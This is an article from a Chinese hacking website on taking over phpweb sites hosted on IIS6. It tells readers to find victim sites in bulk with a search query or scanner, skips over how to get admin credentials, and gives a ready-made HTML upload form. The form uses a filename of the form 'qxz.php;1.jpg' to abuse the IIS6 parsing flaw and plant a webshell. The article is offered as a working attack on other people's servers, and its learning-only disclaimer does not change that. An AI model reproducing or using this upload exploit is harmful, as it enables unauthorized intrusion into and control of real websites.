欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

phpweb+iis6解析漏洞拿shell过程

来源:本站整理 作者:佚名 时间:2016-01-04 TAG: 我要投稿

为了达到想要的效率,我们可以批量的找phpweb的站点,

关键字:inurl:news/html/?411.html 也可以用一些web漏洞批量检测的,譬如黑吧安全网web漏洞扫描器,本人也在用的,虽然有点老

不过还是有些作用的。文章最后给出下载地址。对了,现在谷歌不能用了,再给出一个访问谷歌的地址 http://91.213.30.153/


后台网址后面直接加 admin.php 。 账号密码怎么拿就不多说了,都懂的。记住拿iis6.0的站点,进入后台不要关闭


复制以下代码保存为.HTML格式
代码:-
--------------------------------------------------------------------------------------------------------------
<form name="uploadForm" method="post" enctype="multipart/form-data" action="http://www.xxx.com/kedit/upload_cgi/upload.php">
<input type="text" name="fileName" value="qxz.php;1.jpg" />
<input type="hidden" name="attachPath" value="news/pics/" />
<input type="file" name="fileData" size="14" /></td>
<input type="submit" name="button" value="确定" />
</form>
-------------------------------------------------------------------------------------
里面的www.xxx.com为你的网址


打开之后会是一个上传的页面,你就把一句话,或者是马上传,记住,后缀一定是这种 qxz.php;1.jpg 格式,然后查看网页源代码,就会有个路径


这就是马的路径,ok就这么简单。

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载